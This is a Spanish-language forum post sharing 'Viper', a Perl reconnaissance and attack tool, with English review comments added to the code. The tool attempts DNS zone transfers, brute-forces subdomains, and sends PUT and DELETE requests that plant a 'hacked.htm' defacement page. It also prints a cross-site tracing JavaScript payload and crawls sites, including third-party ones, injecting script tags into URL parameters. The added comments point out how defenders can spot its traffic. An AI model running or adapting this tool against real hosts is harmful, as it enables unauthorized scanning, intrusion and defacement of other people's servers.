Viper 0.1 Priv8 Tool By Xianur0

Iniciado por @ed33x, Enero 27, 2011, 08:48:15 PM


Enero 27, 2011, 08:48:15 PM Ultima modificación: Marzo 14, 2015, 09:52:10 AM por Expermicid
Código: perl
#!/usr/bin/perl


  use MIME::Base64::Perl;
  use IO::Socket::SSL;
  use Net::DNS;
  use Net::DNS::RR;
  use NetAddr::IP;
  use LWP::UserAgent;
  use Socket;
  use HTTP::Request::Common;
  use XML::Simple;
  use Getopt::Std;
  use HTML::LinkExtor;
  use URI::URL;
  use HTML::Parser;
  use Data::Dumper;
  use Term::ANSIColor qw(:constants);
    $Term::ANSIColor::AUTORESET = 1;

#Viper By Xianur0
#[email protected]

# CONFIGURATION:
#------------------------------------------
# Version string. NOTE(review): nothing in the code shown reads $ver.
$ver = "0.3";
# Fixed browser User-Agent sent by the LWP-based requests (spider/info).
$useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
# TLD => whois server used by whois(); TLDs not listed here are reported as
# unavailable.
%whoisserver = (
         'com', 'whois.crsnic.net',
         'net', 'whois.crsnic.net',
         'edu', 'whois.crsnic.net',
         'org', 'whois.publicinterestregistry.net',
         'info', 'whois.rotld.ro',
'mx', 'whois.nic.mx');
# Shared HTTP client; spider() and info() replace it with a fresh instance.
$ua = LWP::UserAgent->new;
# Signature library loaded from a local XML file. The sections read in this
# file are: server, header, estado, whois and http. Their contents are matched
# as regular expressions against remote responses.
my $lib = XMLin("libs/lib.xml");
#-------------------------------------------
    print BOLD RED  "\n                                ..::Viper By Xianur0::..\n\n";
# First argument is the target host. The shift on the next line removes it
# from @ARGV, so every later $ARGV[n] is relative to the remaining arguments.
my $host = $ARGV[0];
$host = shift || die "[-]Uso: dns.pl [dominio] [opciones]\nOpciones:\n-h HTTP AttackToolKit\n-w Ataque Whois\n-d Ataque DNS\n-a Ejecuta Todo lo Anterior\n-x Testear XSS Mixto\n-t Spider y Testeo de codigo (BETA) [host] -t [path]\n-i Scanner de Paths y RSS (BETA) [host] -i [path]\n";
# Read after the shift: this is the second remaining argument (the [path] in
# "[host] -t [path]"). It is concatenated below without a separator or any
# validation; when a second option flag is given instead of a path, that flag
# ends up in $urlp.
my $path = $ARGV[1];
my $urlp = "http://".$host.$path;
# Sanity check only: the object is discarded, the script just dies when the
# host cannot be turned into an address.
new NetAddr::IP($host) || die "Error: IP o Dominio Incorrecto!\n";
print "\n[-]Inicio del Scanneo: ". localtime()."\n";
        # All options are boolean flags; getopts stores them in the package
        # hash %opt.
        my $opt_string = 'whdtaxi';
        getopts( "$opt_string", \%opt );
        whois() if $opt{w};
        dns() if $opt{d};
        http() if $opt{h};
        todo() if $opt{a};
        xss() if $opt{x};
        info() if $opt{i};
        # spider() is evaluated as part of the print expression, so the crawl
        # runs first and its return value is appended to the banner text.
        print "[-]Lanzando Spider!\n". spider($urlp) if $opt{t};
        print "[-]Fin del Scanneo: ". localtime(). "\n";

# Run the whole DNS pass against the global $host, in a fixed order.
# Order matters: ns() fills @sdns and dnsrotativo() leaves $ipaddr set, and
# zonas() reads both.
sub dns() {
    my @pasos = (
        \&soa, \&mx, \&txt, \&ns, \&hinfo,
        \&dnsrotativo, \&any, \&zonas, \&xss,
    );
    for my $paso (@pasos) {
        $paso->();
    }
}
# "-a" mode: run every module one after another and finish with the spider
# on the start URL built at program start ($urlp).
sub todo() {
    for my $modulo (\&info, \&whois, \&dns, \&http, \&xss) {
        $modulo->();
    }
    print "[-]Lanzando Spider!\n";
    spider($urlp);
}

# Look for round-robin DNS: resolve the host repeatedly through consultar()
# (which stores the address in the global $ipaddr) and keep resolving until
# the address seen on the first pass shows up again.
sub dnsrotativo {
    print "[-]Buscando DNS Rotativos (Mediante PTR)...:\n";
    # Result is not used below; the lookup itself is kept as in the original.
    my $consulta = NetAddr::IP->new($host);

    consultar();
    my $primera = $ipaddr;
    consultar();
    until ($primera eq $ipaddr) {
        consultar();
    }
}

# Resolve the global $host with NetAddr::IP and print the PTR record(s) found
# for its address. The address is left in the package global $ipaddr, which
# dnsrotativo() and zonas() read afterwards.
sub consultar {
    my $objetivo = NetAddr::IP->new($host) || die "Error: IP o Dominio Incorrecto!\n";
    my $resolver = Net::DNS::Resolver->new;
    my $total    = $objetivo->num();

    for (my $n = 0; $n < $total; ++$n) {
        # $objetivo is never advanced, so every pass reads the same address.
        $ipaddr = $objetivo->addr();
        next unless $ipaddr;

        my $respuesta = $resolver->search("$ipaddr");
        next unless $respuesta;

        for my $rr ($respuesta->answer) {
            next unless $rr->type eq "PTR";
            print "IP: $ipaddr\n", "Host: ", $rr->ptrdname, "\n\n";
        }
    }
}

# Print the first record of the SOA answer for the global $host.
sub soa {
    print "[-]Registro SOA:\n";

    my $resolver  = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "SOA");
    if ($respuesta) {
        my ($primero) = $respuesta->answer;
        $primero->print;
    }

    print "\n\n";
}

# Request a full zone transfer (AXFR) for $host from every name server in
# @sdns and print each record returned. When a server refuses, fall through to
# the wildcard check in detectarcomodin().
#
# A name server that answers AXFR for arbitrary clients hands out the whole
# zone; limiting transfers to the secondaries is what makes this routine take
# the "Error!" branch.
sub zonas {
    # No name servers were collected: use the address left in $ipaddr instead.
    $sdns[0] = $ipaddr if $sdns[0] eq "";

    foreach $dnsa (@sdns) {
        print "[-]Intentando Ataque AXFR....: Usando: $dnsa...";

        my $resolver = Net::DNS::Resolver->new;
        $resolver->nameservers($dnsa);
        my @zonas = $resolver->axfr($host);

        if (@zonas) {
            foreach $array (@zonas) {
                $dat = $array->string;
                # Unanchored pattern; the dots match any character.
                if ($dat =~ m/127.0.0.1/) {
                    print BOLD RED "\n\n[-]Vulnerable a XSS Mixto!\n         [-] $dat\n\n\n";
                }
                print $dat."\n";
            }
            print BOLD RED  "\nVulnerado :D!\n\n";
        }
        else {
            print "Error!..........\n";
            detectarcomodin();
        }

        print "\n\n";
    }
}

# Print the NS records of $host and append each name server to the package
# array @sdns, which zonas() later iterates over.
sub ns {
    my $resolver  = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "NS");

    if ($respuesta) {
        print "[-]Servidores DNS:\n";
        for my $rr (grep { $_->type eq 'NS' } $respuesta->answer) {
            print $rr->nsdname ."\n";
            push @sdns, $rr->nsdname;
        }
    }

    print "\n\n";
}

# Print every record of the HINFO answer for $host, if there is one.
sub hinfo {
    my $resolver  = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "HINFO");

    if ($respuesta) {
        print "\n[-]Registro HINFO:\n";
        for my $rr ($respuesta->answer) {
            $rr->print;
        }
    }

    print "\n\n";
}

# Print the MX answer for $host. Nothing is printed when the query returns no
# packet.
sub mx {
    my $resolver  = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "MX");
    return unless $respuesta;

    print "\n[-]Servidores de Correo: \n";
    for my $rr ($respuesta->answer) {
        $rr->print;
    }
    print "\n";
}

# Print the TXT answer for $host. The banner calls it "MX configuration", but
# the query is a plain TXT lookup and every record in the answer is printed.
sub txt {
    my $resolver  = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "TXT");
    return unless $respuesta;

    print "\n[-]Registro TXT (Configuracion MX): \n";
    for my $rr ($respuesta->answer) {
        $rr->print;
    }
    print "\n\n";
}

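# Send an ANY query for the global $host and print every record in the answer.
# The banner text had a mis-encoded character sequence in "informacion"; it is
# written in plain ASCII here, like the other messages in this file.
sub any {
    print "[-]Obteniendo informacion Extra:\n";

    my $resolver  = Net::DNS::Resolver->new;
    my $respuesta = $resolver->query($host, "ANY");
    if ($respuesta) {
        for my $rr ($respuesta->answer) {
            $rr->print;
        }
    }

    print "\n\n";
}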

# Wildcard check: try to resolve a label that should not exist under $host.
# If it resolves, the zone is treated as having a wildcard record and the
# HTTP-based check (brute2) is used; otherwise the dictionary lookup (brute)
# runs.
sub detectarcomodin {
    my $comodin = NetAddr::IP->new("dnshunterxianur0.$host");

    unless ($comodin) {
        print RED  "No Se Detecto Comodin :).\n";
        brute();
        return;
    }

    print "\nServidor Protegido contra DNS Brutes Forces....";
    brute2();
}

# Dictionary lookup of subdomains: every line of libs/db.txt is tried as a
# label in front of the target domain, and names that resolve are printed.
# A name resolving to 127.0.0.1 is additionally reported as "XSS Mixto".
#
# Seen from the DNS side this is a burst of lookups for dictionary labels
# under one zone, typically answered mostly with NXDOMAIN; resolver or
# authoritative query logs are where it is visible.
sub brute() {
# Package-global flag: the body runs at most once per process.
if($brute ne "on") {
$brute = "on";
$db = 'libs/db.txt';
my $sub;
# Two-argument open on a bareword handle; the path is the constant above.
open(SUBS, $db) || die "No existe la DB!\n";
# "www." is used as an unanchored regex here and in split, so the dot matches
# any character and the match may occur anywhere in the host name.
if($host =~  "www.") {
my @dat = split("www.", $host);
$hostts = $dat[1];
}
else { $hostts = $host; }
while($sub = <SUBS>){
chomp($sub);
$remoto = "$sub.$hostts";
my $consulta = new NetAddr::IP($remoto);
if($consulta) { print "$remoto existe!\n"; $is = $consulta->addr();
if($is eq "127.0.0.1") {
    print BOLD RED "\n\n[-]Vulnerable a XSS Mixto!\n         [-] $remoto : 127.0.0.1\n\n\n";
}

# Called once per resolved name. robots() builds its URL from the global
# $host, not from $remoto.
&robots;}

}
close(SUBS);
}}

# Follow-up to the wildcard check: request a made-up name under $host through
# the shared LWP client and decide from the response code whether to continue
# with brute3().
sub brute2 {
    $url = "detectarcomodinesenlosregistroshost.$host";
    $req = HTTP::Request->new(GET => $url);
    headers();
    $res    = $ua->request($req);
    $estado = $res->code;

    # Numeric comparison: "" counts as 0, so any non-zero status code takes
    # the first branch.
    if ($estado != "") {
        print "Servidor Protegido Contra Brutes Forces en el Header Host del HTTP :(...\n";
    }
    else {
        brute3();
    }
}

# Add a fixed set of browser-like request headers to the request object held
# in the package global $req.
sub headers {
    my @cabeceras = (
        [ 'Accept',          'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5' ],
        [ 'Accept-Language', 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3' ],
        [ 'Keep-Alive',      '300' ],
        [ 'Connection',      'keep-alive' ],
        [ 'Accept-Charset',  'ISO-8859-1,utf-8;q=0.7,*;q=0.7' ],
    );

    for my $par (@cabeceras) {
        my ($nombre, $valor) = @$par;
        $req->header($nombre => $valor);
    }
}

# For every label in db.txt, build "<label>.$host" and report the name when a
# TCP connection to port 80 succeeds. Note the word list path differs from the
# one brute() uses (libs/db.txt).
sub brute3 {
    $db = 'db.txt';
    my $sub;
    open(SUBS, $db) || die "No existe la DB!";

    my $proto = getprotobyname('tcp');

    while ($sub = <SUBS>) {
        chomp($sub);
        $remoto = "$sub.$host";

        my $ip_bin  = inet_aton($remoto);
        my $destino = sockaddr_in(80, $ip_bin);

        socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
        $conected = connect(SOCKET, $destino);
        close SOCKET;

        print "$remoto Existe!\n" if $conected;
    }

    close(SUBS);
}

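# Fetch http://$host/robots.txt through the shared LWP client and print the
# body between two rulers when it is served as non-empty text/plain.
#
# The emptiness test is a string comparison. The original used `!=`, which
# compares numerically, so a body that does not start with a non-zero number
# was treated as empty and never printed.
sub robots {
    $req = HTTP::Request->new(GET => "http://$host/robots.txt");
    &headers;
    $res = $ua->request($req);
    return unless $res->is_success;

    if ($res->content_type eq 'text/plain' && $res->content ne "") {
        print "--------------------------------------------------------------------------------------\n".$res->content."\n--------------------------------------------------------------------------------------\n";
    }
}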
# Probe port 80 of the global $host with four hand-written HTTP requests
# (OPTIONS, PUT, TRACE, DELETE) and report what the server reveals or accepts.
# Plain HTTP only. The PUT and DELETE requests are state-changing: they ask
# the server to create and then remove /hacked.htm.
#
# On the server side the sequence is easy to recognise in access logs:
# OPTIONS /, PUT /hacked.htm, TRACE / and DELETE /hacked.htm from one client
# in quick succession. A server that rejects PUT, DELETE and TRACE gives the
# last three checks nothing to report, assuming the "estado" list in lib.xml
# holds only success codes (its contents are not visible here; confirm).
sub http() {
use IO::Socket;
print "\n[-]HTTP Attack ToolKit: \n\n";
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'1', );
# Everything below, including the PUT/TRACE/DELETE probes, sits in the else
# branch of this first connection check.
if(!$sock) {print "No se Pudo Conectar a $host!\n"; } else {
# Lines are terminated with bare "\n" here, not CRLF.
print $sock "OPTIONS / HTTP/1.1\nHost: $host\n\n";
print "-----------------------Headers--------------------------\n";
while ($linea = <$sock>) {
if ($linea =~  "HTTP/1.") {
print "Estado De Respuesta: ".$linea;
}
if ($linea =~  /Server:/) {
print $linea;
# Banner fingerprinting: each "banner" string from lib.xml is applied to the
# Server line as an unescaped regular expression.
for( @{$lib->{server}} ) {
if ($linea =~  "$_->{banner}") { print "Tipo de Servidor: $_->{nombre}\n"; }
}
}
# Other headers of interest, again matched with patterns from lib.xml; lines
# containing "<" are skipped before the header value is printed.
for( @{$lib->{header}} ) {
if ($linea =~  "$_->{banner}") {
if($linea !~ "<") {
my @header = split(": ", $linea);
print "$_->{nombre}".$header[1];
}
}
}
}
close($sock);
print "-------------------------------------------------\n\n";
#PUT
# New connection; from here on a failed connect ends the whole program (die).
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  ); die "No se Pudo Conectar a $host!\n" unless $sock;
# The header block ends with "\n\r\n\r", which is not the CRLF CRLF sequence.
print $sock "PUT /hacked.htm HTTP/1.1\nHost: $host\nContent-Length: 38\n\r\n\r<h1>Vulnerado por DNS Hunter 0.2</h1>\n\r\n\r";
# The whole response is read, but only its first line (the status line) is
# tested, with an unanchored match against every "numero" from lib.xml.
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a PUT!!....\n      Estado de Respuesta: $_->{numero}\n\n";
}
}
close($sock);
#TRACE
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "TRACE / HTTP/1.1\nHost: $host\n\r\n\r";
# TRACE is considered enabled when any response line contains "message/http";
# the tool then prints a fixed demonstration snippet with $host filled in.
while ($linea = <$sock>) {
if ($linea =~  "message/http") {
print "[-]Vulnerable a TRACE!.....:\nCodigo XST de Demostracion:.\n------------------------------------------\n<script>\nvar xmlhttp = new XMLHttpRequest();\n//var xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');\nActiveXObject('Microsoft.XMLHTTP');\nxmlhttp.open('TRACE','http://$host/',false);\nxmlhttp.send(null);\ntext=xmlhttp.responseText;\ndocument.write(text);\n</script>\n------------------------------------------\n\n";
}
      }
close($sock);
#DELETE
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
# Same evaluation as the PUT probe: first response line against the estado list.
print $sock "DELETE /hacked.htm HTTP/1.1\nHost: $host\n\r\n\r";
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a DELETE!!....\n      Estado de Respuesta: $_->{numero}\n\n";
}
}
close($sock);
}}

# Query the whois server configured for the TLD of $host, print the lines that
# match, and follow a "Whois Server" referral if the response contains one.
#
# NOTE(review): both the referral host name and the text printed from it come
# straight from the remote response; the name is connected to and the text is
# written to the terminal without any filtering.
sub whois() {
# TLD = last dot-separated label of the host.
my @hosts = split(/\./, $host);
$extencion = pop(@hosts);
$whoisserver = $whoisserver{$extencion};
if($whoisserver eq "") {print "Whois No Disponible para la Extencion: $extencion";} else {
my $sock = new IO::Socket::INET ( PeerAddr => $whoisserver, PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
# $sock is not checked; a failed connect leaves it undefined for the print
# and the read loop below.
print $sock "=".$host."\n";
print "\n[-]Whois ($whoisserver): \n-------------------------<Whois>----------------------------\n\n";
while ($linea = <$sock>) {
# $host is used as an unescaped regex, so its dots match any character.
if($linea =~ $host) {
print "Server: $linea";
}
if($linea =~ "Whois Server") {
my @dato = split(": ", $linea);
# chop removes exactly one trailing character (presumably the newline; with
# CRLF line endings a "\r" would remain - confirm).
chop($dato[1]);
print "Server Whois Interno: $dato[1]";
# Second-level lookup against the server named in the response.
my $who = new IO::Socket::INET ( PeerAddr =>$dato[1], PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
if($who) {
print $who $host."\n";
print "\n[-]<Whois Interno de $host>\n\n";
print <$who>;
print "\n\n[-]</Whois Interno de $host>\n\n";
}
} else {
# Remaining lines: print the value of any field whose label matches an
# "etiqueta" pattern from lib.xml.
for( @{$lib->{whois}} ) {
if ($linea =~  "$_->{etiqueta}") {
my @dato = split(": ", $linea);
print "$_->{imprimir}".$dato[1]; }
}
}}
print "\n-------------------------</Whois>----------------------------\n\n";
}}

# Recursive crawler. Fetches the given URL, collects the attribute values of
# its <a> tags, rewrites every "=" in each link with a fixed script-tag marker,
# requests the rewritten URL and reports a finding when the response body
# matches one of the "etiqueta" patterns from lib.xml. Each rewritten URL is
# then crawled in turn.
#
# NOTE(review): there is no depth limit and no check that a link stays on
# $host, so the rewritten requests also go to whatever third-party sites the
# pages link to.
#
# The marker string "=-1 <script>alert(Fenix)</script> -1" in query strings is
# a fixed, loggable signature of this crawler.
sub spider() {
my $hostt=shift;
# %lista is the visited set: a URL is processed only the first time it is seen.
if($lista{$hostt} ne $hostt) {
$lista{$hostt} = $hostt;
  my @nexo = ();
  # NOTE(review): a named sub nested in a sub binds to the @nexo of the first
  # call only; on recursive calls links are likely pushed to that first array
  # rather than to the current one - confirm.
  sub tags {
     my($tag, %attr) = @_;
     return if $tag ne 'a';
     push(@nexo, values %attr);
  }
  $p = HTML::LinkExtor->new(\&tags);
  # Replaces the shared client and sets the fixed browser User-Agent.
  $ua = LWP::UserAgent->new;
  $ua->agent($useragent);
  $res = $ua->request(HTTP::Request->new(GET => $hostt),
                      sub {$p->parse($_[0])});
  # Any failed request, whatever the cause, is reported as a blocked User-Agent.
  if(!$res->is_success) { print YELLOW  "\nUser-Agent: $useragent Bloqueado!\n"; } else {
  my $base = $res->base;
  # Resolve every collected link against the response's base URL.
  @nexo = map { $_ = url($_, $base)->abs; } @nexo;
   foreach $url (@nexo) {
my @dat = split("/", $url);
if($dat[0] eq "") { $url = "http://".$host.$url;}
  # Single-quote delimiters: no interpolation. Every "=" in the URL is
  # replaced, not only those in the query string.
  $url =~ s'='=-1 <script>alert(Fenix)</script> -1'g;
  $req = HTTP::Request->new(GET => $url);
  $req->header('Accept' => 'text/html');
  $res = $ua->request($req);
  if ($res->is_success) {
    $contenido = $res->content;
# Patterns come from lib.xml and are applied as unescaped regexes.
for( @{$lib->{http}} ) {
if ($contenido =~  "$_->{etiqueta}") {
print "\n\nBug Detectado: $_->{imprimir}".$url."\n\n"; }
}
  }
# Recurse on the rewritten URL, whether or not the request succeeded.
spider($url);
}
}
}}

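# Check whether "localhost.<host>" resolves, and report it when the address is
# 127.0.0.1 (what this tool calls "XSS Mixto"). The usual fix on the zone
# owner's side is to remove the "localhost" record from the public zone.
#
# When the name does not resolve the sub now returns. The original called
# exit here, which ended the whole program in the common (non-vulnerable)
# case, skipping every later module and the end-of-scan banner.
sub xss(){
    $xssmixto = NetAddr::IP->new('localhost.'.$host) or return;
    $ipv = $xssmixto->addr();
    if ($ipv eq "127.0.0.1") {
        print BOLD RED  "\n[-]Vulnerable a XSS Mixto!\n[-]localhost.$host: $ipv\n\n\n";
    }
    return;
}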


# "-i" mode: look for files named in libs/temps.txt under the start URL
# (tempse) and fetch the start page (cms). The three named subs nested below
# (tempse, cms, parsear) are ordinary package subs despite their position.
#
# On the server side tempse shows up as a run of HEAD requests for dictionary
# file names from one client.
sub info() {
    # Local copies that shadow the file-level $lib and the global $useragent.
    my $lib = XMLin("libs/lib.xml");
    $Term::ANSIColor::AUTORESET = 1;
    $ua = LWP::UserAgent->new;
    my $useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
    my $web = $urlp;
# NOTE(review): $parser is built with parsear as its start-tag handler, but no
# parse call on it appears in the code shown, so parsear does not run.
my $parser = HTML::Parser->new(api_version=>3,
start_h=>[\&parsear, 'tag, attr'] ,);
$useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";

&tempse;
&cms;

# Request "$web/<name>" with HEAD for every line of libs/temps.txt and print
# the URLs that answer with a success status.
# NOTE(review): TEMPS is not closed in the code shown. $web and $useragent are
# lexicals of info(); a nested named sub binds to those of the first call only.
sub tempse {
print RED "\nLoading Dictionary....\n";
my $temp;
open(TEMPS, "libs/temps.txt") || die "No existe la DB!\n";
while($temp = <TEMPS>){
chomp($temp);
$tempurl = $web."/".$temp;
  $req = HTTP::Request->new(HEAD => $tempurl);
  $req->header('Accept' => 'text/html');
  $ua->agent($useragent);
  $res = $ua->request($req);
  if ($res->is_success) {
print "Interesting File Found: ".$tempurl."\n";
  }
}
}

# Fetch the start page and keep its body in the global $html. Nothing in the
# code shown processes $html afterwards, and $p is not used.
sub cms {
  my $p = new HTML::Parser;
  $req = HTTP::Request->new(GET => $web);
  $req->header('Accept' => 'text/html');
  $ua->agent($useragent);
  $res = $ua->request($req);
  if($res->is_success) {
$html = $res->content;
# Start-tag handler: for <link> tags whose type contains "application/", build
# an absolute href.
# NOTE(review): the value printed is $rss, which is never assigned in the code
# shown; the computed URL is in $href.
sub parsear {
     my ($tag, $attr) = @_;
if($tag =~ "link") {
$type = $attr->{"type"};
if($type =~ "application/") {
$href = $attr->{"href"};
if($href !~ "http://") { $href = "http://$host/$href";}
print "RSS: ".$rss."\n";
}
}
}

}}}